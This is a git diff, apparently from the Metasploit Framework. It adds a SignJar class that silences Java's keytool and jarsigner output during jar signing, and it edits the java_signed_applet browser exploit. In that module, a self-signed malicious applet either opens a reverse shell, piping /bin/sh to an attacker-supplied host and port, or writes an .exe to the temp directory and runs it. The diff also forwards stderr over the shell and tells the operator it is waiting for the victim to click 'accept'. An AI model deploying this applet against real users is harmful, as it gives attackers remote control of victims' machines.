diff --git a/data/exploits/msfJavaToolkit.jar b/data/exploits/msfJavaToolkit.jar index 08d0425ea0..2d5d734930 100644 Binary files a/data/exploits/msfJavaToolkit.jar and b/data/exploits/msfJavaToolkit.jar differ diff --git a/external/source/msfJavaToolkit/compile.sh b/external/source/msfJavaToolkit/compile.sh index bbb29feb4d..e490fb21ee 100755 --- a/external/source/msfJavaToolkit/compile.sh +++ b/external/source/msfJavaToolkit/compile.sh @@ -1,7 +1,7 @@ #!/bin/bash -javac -classpath $JAVA_HOME/lib/tools.jar:. javaCompile/*.java sun/security/tools/*.java +javac -classpath $JAVA_HOME/lib/tools.jar:. javaCompile/*.java -jar -cf msfJavaToolkit.jar javaCompile/*.class sun/security/tools/*.class +jar -cf msfJavaToolkit.jar javaCompile/*.class mv msfJavaToolkit.jar ../../../data/exploits/ diff --git a/external/source/msfJavaToolkit/javaCompile/CompileSourceInMemory.class b/external/source/msfJavaToolkit/javaCompile/CompileSourceInMemory.class deleted file mode 100644 index 31dbb0a8f2..0000000000 Binary files a/external/source/msfJavaToolkit/javaCompile/CompileSourceInMemory.class and /dev/null differ diff --git a/external/source/msfJavaToolkit/javaCompile/CreateJarFile.class b/external/source/msfJavaToolkit/javaCompile/CreateJarFile.class deleted file mode 100644 index a6a1cce13a..0000000000 Binary files a/external/source/msfJavaToolkit/javaCompile/CreateJarFile.class and /dev/null differ diff --git a/external/source/msfJavaToolkit/javaCompile/CreateJarFile.java b/external/source/msfJavaToolkit/javaCompile/CreateJarFile.java index 95be0e243c..05f7bf3e0b 100644 --- a/external/source/msfJavaToolkit/javaCompile/CreateJarFile.java +++ b/external/source/msfJavaToolkit/javaCompile/CreateJarFile.java @@ -22,7 +22,7 @@ public class CreateJarFile { if (tobeJared[i] == null || !tobeJared[i].exists() || tobeJared[i].isDirectory()) continue; // Just in case... - System.out.println("Adding " + tobeJared[i].getName()); + //System.out.println("Adding " + tobeJared[i].getName()); // Add archive entry JarEntry jarAdd = new JarEntry(tobeJared[i].getName()); @@ -42,7 +42,7 @@ public class CreateJarFile { out.close(); stream.close(); - System.out.println("Adding completed OK"); + //System.out.println("Adding completed OK"); } catch (Exception ex) { ex.printStackTrace(); System.out.println("Error: " + ex.getMessage()); diff --git a/external/source/msfJavaToolkit/javaCompile/JavaSourceFromString.class b/external/source/msfJavaToolkit/javaCompile/JavaSourceFromString.class deleted file mode 100644 index 1b451a4f56..0000000000 Binary files a/external/source/msfJavaToolkit/javaCompile/JavaSourceFromString.class and /dev/null differ diff --git a/external/source/msfJavaToolkit/javaCompile/SignJar.java b/external/source/msfJavaToolkit/javaCompile/SignJar.java new file mode 100644 index 0000000000..2b487c03f2 --- /dev/null +++ b/external/source/msfJavaToolkit/javaCompile/SignJar.java @@ -0,0 +1,54 @@ +// Based on the example from http://www.java2s.com/Code/Java/JDK-6/CompilingfromMemory.htm + +package javaCompile; + +import java.io.PrintStream; +import java.io.FilterOutputStream; +import java.io.ByteArrayOutputStream; +import java.io.OutputStream; +import java.io.IOException; +import sun.security.tools.KeyTool; +import sun.security.tools.JarSigner; + +public class SignJar { + + static PrintStream filteredstream = + new PrintStream( + new FilteredStream( + new ByteArrayOutputStream())); + + public static void KeyToolMSF( String[] args ) { + try { + RedirectStd(); + KeyTool.main( args ); + } catch( Exception ex ) { ex.printStackTrace(); } + } + + public static void JarSignerMSF( String[] args ) { + try { + RedirectStd(); + JarSigner.main( args ); + } catch( Exception ex ) { ex.printStackTrace(); } + } + + private static void RedirectStd() { + try { + System.setOut( filteredstream ); + System.setErr( filteredstream ); + } catch( Exception ex ) { ex.printStackTrace(); } + } + + static class FilteredStream extends FilterOutputStream { + public FilteredStream( OutputStream aStream ) { super ( aStream ); } + + public void write( byte b[] ) throws IOException { + String aString = new String( b ); + // Do stuff with the output. + } + + public void write( byte b[], int off, int len) throws IOException { + String aString = new String( b, off, len ); + // Do stuff with the output. + } + } +} diff --git a/external/source/msfJavaToolkit/output.jar b/external/source/msfJavaToolkit/output.jar index 3bba37093d..996edd281e 100644 Binary files a/external/source/msfJavaToolkit/output.jar and b/external/source/msfJavaToolkit/output.jar differ diff --git a/external/source/msfJavaToolkit/testCompilation.rb b/external/source/msfJavaToolkit/testCompilation.rb index 8011270b18..105179ce18 100755 --- a/external/source/msfJavaToolkit/testCompilation.rb +++ b/external/source/msfJavaToolkit/testCompilation.rb @@ -8,7 +8,8 @@ Rjb::load("#{ENV['JAVA_HOME']}/lib/tools.jar:.",jvmargs=[]) clsJavaCompile = Rjb::import('javaCompile.CompileSourceInMemory') clsCreateJar = Rjb::import('javaCompile.CreateJarFile') -clsFile = Rjb::import('java.io.File') +clsFile = Rjb::import('java.io.File') +system = Rjb::import('java.lang.System') #clsString = Rjb::import('java.lang.String') classNames = [ "HelloWorld1", "HelloWorld2" ] @@ -24,7 +25,8 @@ public class #{name} { }^} #compileOpts = [""] -outputDir = "testoutdir" +#outputDir = system.getProperty('java.io.tmpdir') +outputDir = "testoutdir" compileOpts = [ "-target", "1.3", "-source", "1.3", "-d", outputDir ] success = clsJavaCompile._invoke('CompileFromMemory','[Ljava.lang.String;[Ljava.lang.String;[Ljava.lang.String;', classNames, codez, compileOpts) diff --git a/external/source/msfJavaToolkit/testKeytool.rb b/external/source/msfJavaToolkit/testKeytool.rb index 7ed76c9929..600ecae132 100755 --- a/external/source/msfJavaToolkit/testKeytool.rb +++ b/external/source/msfJavaToolkit/testKeytool.rb @@ -9,13 +9,15 @@ Rjb::load(ENV['JAVA_HOME'] + '/lib/tools.jar:.',jvmargs=[]) # versions of the JDK. Need to find a better way to use sun.security.tools.KeyTool # and .JarSigner than modifying the source. These rely on internal APIs that may # change. -clsKeyTool = Rjb::import('sun.security.tools.KeyTool') +signer = Rjb::import('javaCompile.SignJar') +#clsKeyTool = Rjb::import('sun.security.tools.KeyTool') #clsKeyTool = Rjb::import('sun.security.tools.KeyToolMSF') -clsJarSigner = Rjb::import('sun.security.tools.JarSigner') +#clsJarSigner = Rjb::import('javaCompile.SignJar.JarSignerMSF') +#clsJarSigner = Rjb::import('sun.security.tools.JarSigner') #clsJarSigner = Rjb::import('sun.security.tools.JarSignerMSF') -keytool = clsKeyTool -jarsigner = clsJarSigner +#keytool = clsKeyTool +#jarsigner = clsJarSigner outputJar = "output.jar" @@ -30,13 +32,13 @@ keytoolOpts = ["-genkey", "-alias", "signFiles", "-keystore", "msfkeystore", "-keypass", "msfkeypass"] -keytool._invoke('main','[Ljava.lang.String;',keytoolOpts) +signer._invoke('KeyToolMSF','[Ljava.lang.String;',keytoolOpts) jarsignerOpts = ["-keystore", "msfkeystore", "-storepass", "msfstorepass", "-keypass", "msfkeypass", "-signedJar", "s#{outputJar}", outputJar, "signFiles"] -jarsigner._invoke('main','[Ljava.lang.String;',jarsignerOpts) +signer._invoke('JarSignerMSF','[Ljava.lang.String;',jarsignerOpts) diff --git a/external/source/msfJavaToolkit/testoutdir/HelloWorld1.class b/external/source/msfJavaToolkit/testoutdir/HelloWorld1.class deleted file mode 100644 index d02040fda4..0000000000 Binary files a/external/source/msfJavaToolkit/testoutdir/HelloWorld1.class and /dev/null differ diff --git a/external/source/msfJavaToolkit/testoutdir/HelloWorld2.class b/external/source/msfJavaToolkit/testoutdir/HelloWorld2.class deleted file mode 100644 index eaa1ea1639..0000000000 Binary files a/external/source/msfJavaToolkit/testoutdir/HelloWorld2.class and /dev/null differ diff --git a/lib/msf/core/exploit/java.rb b/lib/msf/core/exploit/java.rb index 88dcc53a99..2cf877768f 100644 --- a/lib/msf/core/exploit/java.rb +++ b/lib/msf/core/exploit/java.rb @@ -123,8 +123,7 @@ module Exploit::Java def sign_jar(cert_cn, unsiged_jar, signed_jar, cert_alias="signFiles", msf_keystore="msfkeystore", msf_store_pass="msfstorepass", msf_key_pass="msfkeypass") # Dependent on $JAVA_HOME/lib/tools.jar that comes with the JDK. - keytool_klass = Rjb::import('sun.security.tools.KeyTool') - jarsigner_klass = Rjb::import('sun.security.tools.JarSigner') + signer_klass = Rjb::import('javaCompile.SignJar') # Check if the keystore exists from previous run. If it does, delete it. msf_keystore = File.join(datastore['JAVACACHE'], msf_keystore) @@ -136,14 +135,14 @@ module Exploit::Java "-keypass", "msfkeypass"] # Build the cert keystore - keytool_klass._invoke('main','[Ljava.lang.String;',keytool_opts) + signer_klass._invoke('KeyToolMSF','[Ljava.lang.String;',keytool_opts) jarsigner_opts = ["-keystore", msf_keystore, "-storepass", msf_store_pass, "-keypass", msf_key_pass, "-signedJar", File.join(datastore['JAVACACHE'], signed_jar), # Signed Jar File.join(datastore['JAVACACHE'], unsiged_jar), # Input Jar we're signing cert_alias] # The cert we're using - jarsigner_klass._invoke('main','[Ljava.lang.String;',jarsigner_opts) + signer_klass._invoke('JarSignerMSF','[Ljava.lang.String;',jarsigner_opts) # There are warnings in the source for KeyTool/JarSigner warning that security providers # are not released, and if you are calling .main(foo) from another app, you need to release diff --git a/modules/exploits/multi/browser/java_signed_applet.rb b/modules/exploits/multi/browser/java_signed_applet.rb index 983d810af6..4da6660e11 100644 --- a/modules/exploits/multi/browser/java_signed_applet.rb +++ b/modules/exploits/multi/browser/java_signed_applet.rb @@ -154,10 +154,10 @@ public class #{datastore['APPLETNAME']} extends Applet data = ""; } - System.out.println("Applet executing. Creating payload class."); + //System.out.println("Applet executing. Creating payload class."); #{datastore['PAYLOADNAME']} site = new #{datastore['PAYLOADNAME']} (); - System.out.println("Payload class instantiated."); + //System.out.println("Payload class instantiated."); site.data = data; if( lhost != null && lport != null) { @@ -167,7 +167,7 @@ public class #{datastore['APPLETNAME']} extends Applet System.out.println("lport: " + Integer.parseInt(lport)); } - System.out.println("data: " + data); + //System.out.println("data: " + data); site.run(); } @@ -237,7 +237,7 @@ public class #{datastore['APPLETNAME']} extends Applet public Object run() throws Exception { - System.out.println("Applet running..."); + //System.out.println("Applet running..."); try { @@ -248,7 +248,7 @@ public class #{datastore['APPLETNAME']} extends Applet //if( #{datastore['PAYLOADNAME']}.data.length() == 0 ) if( this.data.length() == 0 ) { - System.out.println("Applet thinks payload.data is empty."); + //System.out.println("Applet thinks payload.data is empty."); Socket client_socket = null; String shell = "/bin/sh"; @@ -274,16 +274,18 @@ public class #{datastore['APPLETNAME']} extends Applet Process process = Runtime.getRuntime().exec( shell ); ( new StreamConnector( process.getInputStream(), client_socket.getOutputStream() ) ).start(); + + ( new StreamConnector( process.getErrorStream(), client_socket.getOutputStream() ) ).start(); ( new StreamConnector( client_socket.getInputStream(), process.getOutputStream() ) ).start(); } } else { - System.out.println("Applet knows there's data to write. Writing to: " + System.getProperty( "java.io.tmpdir" )); + //System.out.println("Applet knows there's data to write. Writing to: " + System.getProperty( "java.io.tmpdir" )); String filename = Math.random() + ".exe"; String path = System.getProperty( "java.io.tmpdir" ) + File.separator + filename; - System.out.println(filename + " written."); + //System.out.println(filename + " written."); Process p; FileOutputStream fos = new FileOutputStream( path ); @@ -409,7 +411,7 @@ public class #{datastore['APPLETNAME']} extends Applet fd.close end - print_status( "Sending #{datastore['APPLETNAME']}.jar to #{cli.peerhost}:#{cli.peerport}..." ) + print_status( "Sending #{datastore['APPLETNAME']}.jar to #{cli.peerhost}:#{cli.peerport}. Waiting for user to click 'accept'..." ) send_response( cli, @jar_data, { 'Content-Type' => "application/octet-stream" } ) handler( cli )